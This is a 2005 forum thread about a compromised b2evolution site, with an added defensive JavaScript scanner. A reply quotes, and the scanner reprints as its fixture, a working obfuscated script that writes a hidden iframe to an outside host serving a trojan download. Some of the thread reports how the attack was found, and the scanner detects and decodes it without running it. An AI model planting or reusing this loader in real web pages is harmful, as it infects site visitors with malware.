1 Jun 26, 2005 01:40

Howdy. It looks like somehow my b2evo site has picked up a nasty visitor.

I've been told by some using IE that their antivirus software freaks out when they visit my site - now, today, for the first time, when I visit the front page with mozilla, I get an alert asking if I want to download "newexpl.php."

A google search seems to show this as being a trojan, but I have no idea how it got loaded on my host's server, and no idea how to get rid of it.

Any ideas? I did a search here and couldn't find any other topics on this.
Thanks.

2 Jun 26, 2005 08:51

Check your template. Just above </body> you have the following:

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>
#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherugh
u@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljk
w@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1)
{h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);
</script>

From what I've read on the web, that's the line that's causing your grief.


3 Jun 26, 2005 19:17

Thanks. I'll check that out.

4 Jun 27, 2005 19:27

Wow - the obfuscated part writes an IFRAME tag, which then opens a page on the hacker's server, which downloads the newexpl.php.

Inside newexpl.php is this:

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

PCFET0NUWVBF...

It looks like an email message with an attachment.
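Added example, not code from this thread: a defender-side scanner in JavaScript that finds the shifted-charcode document.write loader quoted in reply 2 inside a template file and decodes it without running it, so the hidden iframe that reply 4 describes can be read and its src logged. The template text is constructed around the posted snippet; the regex shape and the function names are my own assumptions, not anything b2evolution ships.

```javascript
// Constructed template fragment: the loader posted in reply 2, sitting just above </body>.
const INJECTED_TEMPLATE = `
<p>Last post of the day.</p>
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
</body>
`;

// Undo the per-character code shift the loader applies at page load (here: -3).
// This is a plain string transform; nothing is evaluated or written to a document.
function decodeShifted(encoded, shift) {
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
  }
  return out;
}

// Tell-tale shape of this loader family: a quoted blob, a charCodeAt(...)-N decode
// loop, and document.write. Captures the blob (group 2) and the shift (group 3).
const LOADER_RE =
  /<script[^>]*>[\s\S]*?var\s+(\w+)\s*=\s*'([^']*)'[\s\S]*?charCodeAt\([^)]*\)\s*-\s*(\d+)[\s\S]*?document\.write[\s\S]*?<\/script>/gi;

// Scan template text and return one finding per decoded loader, with the iframe
// targets it would have injected and whether the wrapper is styled invisible.
function findObfuscatedWriters(html) {
  const findings = [];
  for (const m of html.matchAll(LOADER_RE)) {
    const shift = Number(m[3]);
    const decoded = decodeShifted(m[2], shift);
    const iframeSrcs = [...decoded.matchAll(/<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)]
      .map((x) => x[1]);
    findings.push({
      shift,
      hiddenStyle: /visibility:\s*hidden/i.test(decoded),
      iframeSrcs,
      decoded,
    });
  }
  return findings;
}

// Stand-alone run: report what the injected script would have written.
for (const f of findObfuscatedWriters(INJECTED_TEMPLATE)) {
  console.log(`shift=${f.shift} hidden=${f.hiddenStyle} iframes=${f.iframeSrcs.length}`);
  console.log(f.decoded);
}
```

The same scan can be pointed at every .php template under the site root, which is how reply 8's "still infected" case would be confirmed or ruled out without loading the pages in a browser.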

5 Jun 27, 2005 19:41

Now how did that get in there, that's my worry... a new level of spam?

6 Jun 27, 2005 20:10

From what I found in a quick google trip, the most likely candidate is that someone else in a shared hosting environment hacked their way into being able to edit your files. This has happened on WordPress and Mambo sites as well. I suspect that any CMS that uses .php templates probably could fall victim to this attack if the server is vulnerable, but that's just my theory.

7 Jun 27, 2005 20:46

Well, the other person online I saw affected was hosted by l40.net, and I am, so apparently they aren't secure.

After they have changed my IP address 2 times in the last few months, and broken the Coppermine functionality in the process, and now this, and their support is nonexistent, I think I will be finding another host.

8 Jul 21, 2005 07:21

Hi...
Well, I edited out the offending text above, and still my site seems to be infected. I have spent the last several weeks trying to find out what's going on, difficult because I've been away from home with only sporadic web access... and my webhost is no help.

This is my last plea for help, if I can't get this solved in the next couple of days I'm just wiping my site clean and shutting down for good...

Any clues at all? Thanks.

9 Jul 21, 2005 14:15

I would change webhosts and do a clean install of b2evolution at the new host.
